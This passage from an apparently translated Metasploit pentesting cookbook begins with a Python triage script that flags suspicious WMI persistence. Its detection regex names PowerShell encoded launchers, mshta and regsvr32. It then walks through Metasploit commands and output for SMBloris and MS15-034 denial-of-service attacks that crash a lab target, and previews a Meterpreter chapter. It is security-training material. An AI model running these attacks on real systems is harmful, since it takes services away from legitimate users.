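# Typical launcher traits: hidden or encoded PowerShell, script hosts, LOLBins.
LAUNCHER_RE = re.compile(r"powershell|-e(nc)?\s+[A-Za-z0-9+/=]{16,}|-w\s+hidden|frombase64string|mshta|wscript|cscript|regsvr32", re.I)
# Heuristic: short mixed-case alphanumeric names tend to be generated, not chosen.
RANDOM_NAME_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{4,12}$")
OBJECT_PATH_RE = re.compile(r'^(\w+)\.Name="([^"]+)"$')
KV_RE = re.compile(r"^(\S[^:]*?)\s*:\s*(.*)$")

def parse_records(text):
    """Split blank-line separated 'Key : Value' blocks into one dict per WMI object."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            m = KV_RE.match(line)
            if m:
                rec[m.group(1)] = m.group(2)
        if "__CLASS" in rec:
            records.append(rec)
    return records

def triage(text):
    """Resolve every binding to its filter and consumer and list why it looks suspicious."""
    recs = parse_records(text)
    by_key = {(r["__CLASS"], r["Name"]): r for r in recs if "Name" in r}
    results = []
    for binding in (r for r in recs if r["__CLASS"] == "__FilterToConsumerBinding"):
        fm = OBJECT_PATH_RE.match(binding.get("Filter", ""))
        cm = OBJECT_PATH_RE.match(binding.get("Consumer", ""))
        if not (fm and cm):
            continue
        filt = by_key.get((fm.group(1), fm.group(2)), {})
        cons = by_key.get((cm.group(1), cm.group(2)), {})
        reasons = []
        if cm.group(1) in RISKY_CONSUMERS:
            reasons.append(f"{cm.group(1)} runs an arbitrary command or script")
        payload = cons.get("CommandLineTemplate", "") + " " + cons.get("ScriptText", "")
        if LAUNCHER_RE.search(payload):
            reasons.append("consumer payload looks like a hidden or encoded script launcher")
        if LOGON_TRIGGER_RE.search(filt.get("Query", "")):
            reasons.append("filter fires on logon events (4624), the trigger used in step 10")
        if RANDOM_NAME_RE.match(fm.group(2)) or RANDOM_NAME_RE.match(cm.group(2)):
            reasons.append("filter or consumer name looks machine-generated")
        results.append({"filter": fm.group(2), "consumer": cm.group(2),
                        "consumer_class": cm.group(1), "reasons": reasons})
    return results

if __name__ == "__main__":
    for r in triage(SAMPLE_SUBSCRIPTIONS):
        status = "SUSPICIOUS" if r["reasons"] else "benign"
        print(f"{status}: {r['filter']} -> {r['consumer_class']} {r['consumer']}", r["reasons"])
```

On a real host, dump the three classes from root\subscription with Get-WmiObject and pipe the text into triage(); a binding with a CommandLineEventConsumer that no administrator can account for is the one to remove.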

9. Denial-of-service attacks

Denial-of-service attacks usually work by requesting large amounts of resources from the target or by exploiting a vulnerability, consuming the target machine's capacity. A denial-of-service attack stops legitimate users from accessing computer services or resources, and may even crash the service or the operating system.

準(zhǔn)備工作

SMBloris is a Windows SMB vulnerability that has existed for 20 years. It can be used for denial of service (DoS), taking down servers on a large scale. It affects all versions of the SMB protocol and every Windows version since Windows 2000.

How to do it

1. Before launching the SMBloris denial-of-service attack, raise the maximum number of open connections on the attacking machine.

root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#

2. Then use the smb_loris module to attack the target machine

msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run

[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open

3. Looking at the target machine, we can see that the large number of SMB requests sent by the attacker has consumed a large amount of the target's memory. Each NBSS connection can allocate 128 KB of memory, so with a large number of connections the memory can be exhausted, producing a denial of service.


Another frightening DoS attack is MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service.

If a Microsoft Windows 7, Windows 8, Windows Server 2008 or Windows Server 2012 machine is running an IIS service vulnerable to MS15-034, this vulnerability can be used to crash the target server.

msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >

As you can see, the target crashed with a blue screen.

Related online labs

Metasploit attack on a Linux host (lab)

Metasploit attack on Windows Server 2008 (lab)

Chapter 4: Meterpreter (preview)

In this chapter we will learn the following:

1. Understanding Meterpreter core commands
2. Understanding Meterpreter file system commands
3. Understanding Meterpreter networking commands
4. Understanding Meterpreter system commands
5. Setting up multiple communication channels with the target
6. Meterpreter anti-forensics
7. Screen and keystroke sniffing
8. Using the scraper Meterpreter script
9. Enumerating system information with winenum
10. Automation scripts
11. Meterpreter resource scripts
12. Meterpreter timeout control
13. Meterpreter sleep control
14. Meterpreter transports
15. Registry interaction
16. Loading framework plugins
17. APIs and mixins
18. Railgun: turning Ruby into a weapon
19. Adding DLL and function definitions to Railgun
20. Hijacking remote VNC
21. Enabling remote desktop

Notes

Original book: Metasploit Penetration Testing Cookbook - Third Edition

https://www.packtpub.com/networking-and-servers/metasploit-penetration-testing-cookbook-third-edition

This article was translated by Hetian Network Security Lab; please credit the source when republishing.

About Hetian Network Security Lab

Hetian Network Security Lab (www.hetianlab.com): a leading Chinese hands-on online cybersecurity education platform

Real environments for hands-on online learning of cybersecurity; lab content covers system security, software security, network security, web security, mobile security, CTF, forensic analysis, penetration testing, security awareness training and more.
